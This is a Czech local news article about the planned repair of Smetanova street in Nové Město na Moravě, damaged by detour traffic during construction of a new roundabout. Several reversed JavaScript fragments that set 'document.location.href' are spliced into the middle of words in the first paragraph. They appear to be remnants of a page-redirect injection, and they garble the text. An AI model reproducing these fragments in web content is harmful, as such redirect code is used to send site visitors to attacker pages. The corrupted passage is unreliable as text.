Rainbow page separator

Půl roku nadměrně zatěžovaná objízdná trasa se dočká obnovy

Úterý, 19. října 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Rekonstrukce s největší pravděpodobností v roce 2023 by se měla dočkat novoměstská ulice Smetanova. Také po ní byla v průběhu posledního půl roku vedena objízdná trasa z důvodu výstavby okružní křižovatky ulic Masarykova, Soškova a Křičkova. Převedení dopravy z frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované Masarykovy ulice přes sídliště si vyžádalo poškození povrchu komunikace v důsledku jejího značného dopravního zatížení, navíc objízdnou trasu stanovenou výhradně pro osobní dopravu někdy i přes zákaz využívali také řidiči těžkých au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů. Případné opravy spojené s možným poškozením vozovky mohou nastat také v ulici Tyršova navazující na Smetanovu ulici. Tyršova ulice prošla komplexní rekonstrukcí relativně nedávno – stavební úpravy začaly na jaře roku 2019 a dokončeny byly loni na podzim.
Nová okružní křižovatka při výjezdu z centra Nového Města byla zprovozněna 16. října a stala se první z celkem tří plánovaných, které mají na průtahu městem zklidnit provoz a zvýšit bezpečnost v páteřní Masarykově ulici. Druhá z křižovatek má vzniknout na křížení silnic u Komenského náměstí a třetí v Brněnské ulici na silnici I/19 nedaleko prodejny Billa.